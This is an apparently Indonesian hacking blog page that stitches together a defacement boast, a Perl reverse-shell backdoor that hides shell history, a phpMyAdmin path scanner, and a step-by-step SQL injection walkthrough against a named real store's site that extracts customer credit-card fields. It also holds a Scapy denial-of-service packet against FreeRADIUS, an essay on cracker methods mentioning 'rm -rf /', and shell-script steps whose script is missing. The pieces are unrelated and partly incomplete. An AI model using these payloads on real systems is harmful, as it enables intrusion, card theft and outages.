allah akbar STooP Admin .. ! ~@ I S4udi h4ck Where Are Your security ” It’s %0 Your Server Get Root ! I C0ntR0L We Are Here And There And Every Where..!! And Now Your Server In H3LL Dude..!! But Please Admin Don’t Cry Because I Laugh of Your Funny Face For Connect Us :

hihihihi… akhirnya kena deface juga.. paling tidak seperti itulah sekilas jadinya weblog saia yang kena hack… and thank`s untuk anak” S4udi h4ck yang uda bisa masuk matur suwun sudah di ingatken

walaupun ga punya kunci pintu jendela terbuka pun jadi…. kayaknya kata² itu pas untuk script backdor berikut…:

#!/usr/bin/perl
use IO::Socket;
#
#/home/programing$ perl dc.pl
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#/home/programing$ perl dc.pl 127.0.0.1 2121
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host
#
#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 2121
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(rocu) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/sh';
$ARGC=@ARGV;
print "--== Rampok si kacRuT ==-- \n\n";
if ($ARGC!=2) **
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== Rampok si kacRuT ==-- \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#bento

selamad mencoba…

#!/usr/bin/perl
# phpMyAdmin Checker
# Author: mHc@MimiZu (Re Edit) #
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;
my ($add,$iplist,$url,@path,@raw_data);
print q(
phpMyAdmin Checker by mHc
);
if(@ARGV !=1) **
print "Usage: perl phpmyadmin.pl e.g. perl phpmyadmin.pl iplist.txt";
exit;
}
$iplist = shift;
@path = (
"/phpMyAdmin/",
"/PMA/",
"/admin/",
"/dbadmin/",
"/mysql/",
"/myadmin/",
"/phpmyadmin2/",
"/phpMyAdmin2/",
"/phpMyAdmin-2/",
"/php-my-admin/",
"/phpMyAdmin-2.2.3/",
"/phpMyAdmin-2.2.6/",
"/phpMyAdmin-2.5.1/",
"/phpMyAdmin-2.5.4/",
"/phpMyAdmin-2.5.5-rc1/",
"/phpMyAdmin-2.5.5-rc2/",
"/phpMyAdmin-2.5.5/",
"/phpMyAdmin-2.5.5-pl1/",
"/phpMyAdmin-2.5.6-rc1/",
"/phpMyAdmin-2.5.6-rc2/",
"/phpMyAdmin-2.5.6/",
"/phpMyAdmin-2.5.7/",
"/phpMyAdmin-2.5.7-pl1/",
"/phpMyAdmin-2.6.0-alpha/",
"/phpMyAdmin-2.6.0-alpha2/",
"/phpMyAdmin-2.6.0-beta1/",
"/phpMyAdmin-2.6.0-beta2/",
"/phpMyAdmin-2.6.0-rc1/",
"/phpMyAdmin-2.6.0-rc2/",
"/phpMyAdmin-2.6.0-rc3/",
"/phpMyAdmin-2.6.0/",
"/phpMyAdmin-2.6.0-pl1/",
"/phpMyAdmin-2.6.0-pl2/",
"/phpMyAdmin-2.6.0-pl3/",
"/phpMyAdmin-2.6.1-rc1/",
"/phpMyAdmin-2.6.1-rc2/",
"/phpMyAdmin-2.6.1/",
"/phpMyAdmin-2.6.1-pl1/",
"/phpMyAdmin-2.6.1-pl2/",
"/phpMyAdmin-2.6.1-pl3/",
"/phpMyAdmin-2.6.2-rc1/",
"/phpMyAdmin-2.6.2-beta1/",
"/phpMyAdmin-2.6.2-rc1/",
"/phpMyAdmin-2.6.2/",
"/phpMyAdmin-2.6.2-pl1/",
"/phpMyAdmin-2.6.3/",
"/phpMyAdmin-2.6.3-rc1/",
"/phpMyAdmin-2.6.3/",
"/phpMyAdmin-2.6.3-pl1/",
"/phpMyAdmin-2.6.4-rc1/",
"/phpMyAdmin-2.6.4-pl1/",
"/phpMyAdmin-2.6.4-pl2/",
"/phpMyAdmin-2.6.4-pl3/",
"/phpMyAdmin-2.6.4-pl4/",
"/phpMyAdmin-2.6.4/",
"/phpMyAdmin-2.7.0-beta1/",
"/phpMyAdmin-2.7.0-rc1/",
"/phpMyAdmin-2.7.0-pl1/",
"/phpMyAdmin-2.7.0-pl2/",
"/phpMyAdmin-2.7.0/",
"/phpMyAdmin-2.8.0-beta1/",
"/phpMyAdmin-2.8.0-rc1/",
"/phpMyAdmin-2.8.0-rc2/",
"/phpMyAdmin-2.8.0/",
"/phpMyAdmin-2.8.0.1/",
"/phpMyAdmin-2.8.0.2/",
"/phpMyAdmin-2.8.0.3/",
"/phpMyAdmin-2.8.0.4/",
"/phpMyAdmin-2.8.1-rc1/",
"/phpMyAdmin-2.8.1/",
"/phpMyAdmin-2.8.2/",
"/sqlmanager/",
"/mysqlmanager/",
"/p/m/a/",
"/PMA2005/",
"/pma2005/",
"/phpmanager/",
"/php-myadmin/",
"/phpmy-admin/",
"/webadmin/",
"/sqlweb/",
"/websql/",
"/webdb/",
"/mysqladmin/",
"/mysql-admin/");
open(IPLIST, $iplist) || die "
* Error: File not found\n";
@raw_data=;
close(IPLIST);
print " Scan Started\n\n";
foreach $url (@raw_data)
**
chomp($url);
foreach $add (@path)
**
my $address = $url.$add;
my $con = HTTP::Request->new(GET=>$address);
my $useragent = LWP::UserAgent->new;
my $f = $useragent->request($con);
if($f->is_success && $f->status_line =~ /200/)
**
print "[!] Found: $address\n";
open (F,">>","found.txt");
print F "$address\n";
close(F);
}
}
}

from : MiMiZu cRew

Huyee…siapkan sebungkus starmild + kopi susu
langsung sajoo, misal pada site http://www.scootsusa.com/, kita cari link yang ada bugnya…
kita dapet :
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3
Tinggal tambahin tanda petik satu (’) sajoo untuk test Vulnerbilitiesnya

alhasil muncul keterangan error seperti berikut :
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
select * FROM customer_testimonials WHERE testimonials_id = 3\'

Sekarang kita kasi perintah order by…buat nyari ada berapa kolom di sana…
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 order by 20--
artinya kita coba cek langsung di binary 20, sekarang kita kurangin sampe muncul yang true…

ok..kita dapet yang true di binary 8
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 order by 8--
sedangkan yang ke 9 uda false, jadi kita dapet binarynya di angka 8.

Selanjutnya kita bajak pake union select.
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union all select 1,2,3,4,5,6,7,8--
hasilnya :
Testimonial by 4
3
6


Langsung saja misal kita ambil angka 3 atau 6 juga bisa.
kita cek versi sqlnya doeloe…
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union all select 1,2,version(),4,5,6,7,8--
hasilnya :
Testimonial by 4
5.0.67.d7-ourdelta-log
6
ternyata sqlnya versi 5… lanjut bajak si kacrut…

kemudian cari table dan coloumnya…
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union all select 1,2,table_name,4,5,6,7,8 from information_schema.tables where table_schema=database()--

nah lhoo kluar semua tuh nama tablenya…xixiixixixixi
Berhubung sekarang kita mau cari data CC , kita ambil table yg nyimpen data² CC
Biasanya CC ada di table orders.
Karna kita dah nemu table orders,kita coba pake table orders. Table lainnya silahkan oprek sndiri yah…

sekarang kita cari coloumnya…
sebelumnya kita konvert dolo table orders jadi hexa, jadinya 6F7264657273
sebelumnya kita tambahin karakter 0x pada hasil convert tadi kemudian masukkan ke urlnya…
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union all select 1,2,column_name,4,5,6,7,8 from information_schema.columns where table_name=0x6F7264657273--

Alhasil keluar tuh coloum²nya…hohoho
payment_method,cc_type,cc_owner,cc_number,cc_expires, dll

ok skarang kita masukkan data² tadi dan haslinya…
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union select 1,2,concat_ws(0x3a,payment_method,cc_type,cc_owner,cc_number,cc_expires),4,5,6,7,8 from orders--

dan…eng..ing..eng…xixixixiixixixi

semoga aja itu bisa sedikit membantu temen² yg pengen belajar SQL injection..Ini semua hanya sebagai pengetahuan sajooo…saia tidak ikod bertanggung jawab jika di salah pergunakan…

salam hangat…
banksonk

Earlier today, while reading through Full Disclosure, I came across something interesting: a Freeradius DoS bug. This piqued my interest as I’m currently experiencing _something_ that’s periodically knocking over radiusd. Furthermore, the radius server in question talks to a router with problematic L2TP tunnels (caused by a software bugs in L2TP sequencing on the Telco router on the other end…their vendor has confirmed the problems)

Time to create the packet of death. Scapy doesn’t appear to have a layer for RadiusAttributes yet, thankfully it IS in their Trac.

So, download the layer to scapy/layers, ensure that it imports the required items:
import struct
from scapy.packet import *
from scapy.fields import *
from scapy.layers.inet import UDP

from scapy.layers.radius import Radius
Add “radiuslib” to the load_layers array in config.py, and we’re ready to go:
#!/usr/bin/env python
# FreeRadius Packet Of Death
# Matthew Gillespie 2009-09-11
import sys
from scapy.all import IP,UDP,send,Radius,RadiusAttr
if len(sys.argv) != 2:
print “Usage: radius_killer.py \n”
sys.exit(1)
PoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \
Radius(code=1,authenticator=”\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99″,id=180)/ \
RadiusAttr(type=69,value=”",len=2)
send(PoD)

Interestingly, one doesn’t need a shared key to send the packet of death, as you can tell the authenticator for the Access-Request packet is pulled out of thin air.

I’m assuming that most people iptable off access to their radius servers, so playing whack-a-mole with a provider probably isn’t that do-able. Beyond that, to even come close to possibly exploiting this, you need to be listed in clients.conf – so there’s already that level of trust. Correct me if I’m wrong. Either way, updated packages are available.

source : www.braindeadprojects.com

Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di http://www.sans.org, http://www.rootshell.com, http://www.linuxfirewall.org/, http://www.cerias.purdue.edu/coast/firewalls/, http://www.redhat.com/mirrors/LDP/HOWTO/VPN-Masquerade-HOWTO.html. Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di http://www.iss.net/vd/mail.html, http://www.v-one.com/documents/fw-faq.htm. Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di http://bastille-linux.sourceforge.net/, http://www.redhat.com/support/docs/tips/firewall/firewallservice.html.

Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e.

Pada dasarnya dunia hacker & cracker tidak berbeda jauh dunia seni kebetulan disini kita berbicara tentang seni perang & seni keamanan jaringan. Seperti dijelaskan oleh Front-line Information Security Team, “Techniques Adopted By ‘System Crackers’ When Attempting To Break Into Corporate or Sensitive Private Networks,” fist@ns2.co.uk http://www.ns2.co.uk. Seorang cacker umumnya pria usia 16-25 tahun. Melakukan cacking untuk meningkatkan kemampuan atau menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, umumnya cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.

Seperti kita tahu bahwa umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang memudahkan akses ke mail server dalam perusahaan. Dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan.

Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin Windows serangan dapat dilakukan dengan melompat dari software wingate. Atau melompat dari mesin yang menggunakan proxy yang konfigurasinya kurang baik.

Setelah berhasil melompat dan memasuki sistem lain, cracker harus melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk menjalankan perintah ‘ls ‘ , (2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server, (4) menghubungkan diri ke mail server dan menggunakan perintah ‘expn ‘, dan (5) mem-finger user di mesin-mesin eksternal lainnya.

Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.

Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti ‘ps’ & ‘netstat’ di buat trojan (ingat cerita kuda troya?) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.

Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon di server yang lemah. Selanjutnya cracker dapat dengan mudah memperoleh akses sebagai ‘root’ (administrator tertinggi di server).

Untuk menghilangkan jejak, seorang cracker perlu melakukan operasi pembersihan ‘clean-up‘ operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang ‘backdooring’. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh.

Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibaca, cracking mesin lain dengan melompat dari mesin yang di taklukan, memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat, bahkan bisa mematikan jaringan dengan cara menjalankan perintah ‘rm –rf / &’.

Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru.

from : Onno W. Purbo

keterangan :
echo = menampilkan text
rm = perintah untuk remove
touch = untuk membuat file kosong
chmod = merubah permision file

buat file dengan nama terserah, misal luna.sh dengan perintah
nano luna.sh
atau
vi luna.sh
atau
vim luna.sh
atau
pico luna.sh

kemudian isi file tersebut dengan script diatas dan save…
setelah itu beri permision agar file sersebut bisa di esekusi, dengan perintah :
chmod +x luna.sh

setelah itu esekusi file dengan perintah :
./luna.sh

hanya sekedar info dan pembelajaran saja, tidak untuk disalah pergunakan…dan sekalipun disalah pergunakan saya tidak ikut bertanggung jawab….!!!

salam hangat…
banksonk